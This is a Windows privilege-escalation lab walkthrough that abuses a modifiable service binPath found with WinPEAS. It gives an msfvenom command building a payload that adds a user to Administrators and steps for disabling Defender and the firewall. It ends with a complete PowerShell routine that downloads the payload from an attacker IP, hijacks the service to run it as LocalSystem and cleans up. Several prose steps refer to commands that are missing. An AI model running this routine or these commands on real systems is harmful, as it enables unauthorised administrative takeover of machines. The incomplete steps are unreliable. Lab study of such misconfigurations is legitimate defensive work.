Windows Privilege Escalation

Using WinPeas

  • Abusing a service (ASCService.exe) whose permissions let a low-privileged user reconfigure it. WinPEAS also flags unquoted service paths, but the step exploited below is a modifiable service binPath, not the unquoted path itself.

  • Target Windows machine has a non-privileged user: localuser

  • Use MSFVenom to generate a service executable (ASCService.exe) that adds localuser to the local Administrators group when the service starts

1. Generate Payload using MSFVenom

#Generate the malicious exe (exe-service wraps the payload as a proper Windows service binary so the SCM will start it)
msfvenom -p windows/exec CMD='net localgroup administrators localuser /add' -f exe-service -o ASCService.exe

2. Start Web Server on Attack Machine

3. Disable Windows Defender & Firewall on Victim Windows Machine

Run the following from an elevated (Administrator) PowerShell prompt. This is for the lab only: it removes the controls that would otherwise quarantine the payload on download.

4. Fetch the payloads from the Attack Machine's web server using a browser on the Windows Victim

Attacker IP is 172.31.24.120

Browse to the attacker's web server and download the payloads (ASCService.exe and WinPEAS)

  • Move these downloads to the C:\ folder

  • Next, loosen the service's security descriptor so that local users can start, stop and reconfigure the service. This simulates excessive permissions on a service (the misconfiguration WinPEAS reports under Modifiable Services).

The sc sdset command should return [SC] SetServiceObjectSecurity SUCCESS.

Run Command Prompt as Different User

Search cmd > right click > Run as different user > enter localuser's credentials

Check which accounts are in local administrators group

C:\> net localgroup administrators

Run WinPeas.exe

WinPeas.exe enumerates privilege escalation paths on Windows systems
  1. Run the services information checks

WinPEAS reports AllAccess for AdvancedSystemCareService9 in the Modifiable Services section, meaning the current user can change the service configuration, including its binary path.

A few sections often used for privilege escalation are the

  • Interesting Services -non Microsoft-

  • Modifiable Services sections.

Now query the service configuration (current binary path, start type and the account it runs as) using:

Next, confirm that localuser can start and stop the service using:

Now modify the service binPath to point to our payload executable, so that starting the service runs the command that adds localuser to the Administrators group:

Now start the service, which executes our payload as the service account (LocalSystem):

Since we have permission to modify the service itself, we leverage the service to add localuser to the local Administrators group. Re-run net localgroup administrators to confirm. Note that the new group membership only appears in a fresh logon token: log off and back on (or open a new "Run as different user" prompt) before expecting administrative rights.
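The whole victim-side procedure above, written out as an added PowerShell example (this is not the page's own command set or WinPEAS code). It reuses the service name, payload name and attacker IP from the page; the HTTP port 8000, the SDDL string used to weaken the service, the Test-ServiceModifiable and Invoke-ServiceBinPathHijack function names, and the sleep interval are assumptions for this lab. The ACL check reproduces by hand what WinPEAS's Modifiable Services section reports, so you can confirm the misconfiguration before touching the binPath.

```powershell
# Added worked example; not the original page's commands. Assumed: service name,
# payload name and attacker IP come from the page; port 8000 and the SDDL below
# are lab assumptions.
$Service    = 'AdvancedSystemCareService9'
$PayloadUrl = 'http://172.31.24.120:8000/ASCService.exe'   # port assumed
$Payload    = 'C:\ASCService.exe'
$Group      = 'Administrators'
$User       = 'localuser'

# --- Lab setup (elevated prompt, run once): simulate excessive service permissions ---
# Gives BUILTIN\Users (BU) the same full-control ACE as Administrators (BA).
# Service rights in SDDL: DC = SERVICE_CHANGE_CONFIG, RP = SERVICE_START, WP = SERVICE_STOP.
function Set-WeakServiceAcl {
    param([string]$Name)
    $sddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)' +
            '(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
            '(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BU)'          # assumed SDDL
    sc.exe sdset $Name $sddl       # expect: [SC] SetServiceObjectSecurity SUCCESS
}

# --- The check WinPEAS performs, done by hand: can a broad group reconfigure the service? ---
# Parses the DACL from `sc sdshow` and returns ACEs granting Everyone (WD),
# Authenticated Users (AU), Builtin Users (BU) or Interactive (IU) the
# change-config (DC), generic-all (GA) or write-DAC (WD) right.
# Simplification: does not resolve the current user's own group SIDs.
function Test-ServiceModifiable {
    param([string]$Name)
    $sddl  = (sc.exe sdshow $Name) -join ''
    $broad = @('WD', 'AU', 'BU', 'IU')
    $hits  = foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([A-Z]*);;;([A-Z]+|S-[\d-]+)\)')) {
        $rights = $m.Groups[1].Value
        $who    = $m.Groups[2].Value
        if (($broad -contains $who) -and ($rights -match 'DC|GA|WD')) {
            [pscustomobject]@{ Service = $Name; Trustee = $who; Rights = $rights }
        }
    }
    return $hits
}

# --- Exploitation (as localuser, no elevation) ---
# Downloads the payload, records the original binPath, points the service at the
# payload, starts it (the SCM runs it as LocalSystem), then restores the binPath.
# Caveat: the original path is re-applied unquoted, as it was in this lab; a path
# that already carries its own quotes would need them stripped first.
function Invoke-ServiceBinPathHijack {
    param([string]$Name, [string]$Url, [string]$Exe)
    Invoke-WebRequest -Uri $Url -OutFile $Exe
    $qc   = sc.exe qc $Name
    $orig = ($qc | Select-String 'BINARY_PATH_NAME').ToString().Split(':', 2)[1].Trim()
    Write-Host "Original binPath: $orig"
    sc.exe stop $Name | Out-Null                     # harmless if not running
    sc.exe config $Name binPath= "$Exe"              # the space after 'binPath=' is required
    sc.exe start $Name
    Start-Sleep -Seconds 3                           # give 'net localgroup ... /add' time to run
    sc.exe config $Name binPath= "$orig"             # clean up
    return [bool]((net localgroup $Group) -match "^\s*$User\s*$")
}

# Usage:
#   (elevated, once)  Set-WeakServiceAcl -Name $Service
#   (as localuser)    Test-ServiceModifiable -Name $Service        # expect a BU row containing DC
#   (as localuser)    Invoke-ServiceBinPathHijack -Name $Service -Url $PayloadUrl -Exe $Payload
# Then log off and on again: the Administrators membership lands in the next logon token.
```

Test-ServiceModifiable is the step worth keeping in your own toolkit: `sc sdshow` works for any account that can read the service's security descriptor, and an ACE on BU, AU or WD carrying DC or GA is exactly the condition that makes the binPath swap possible.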
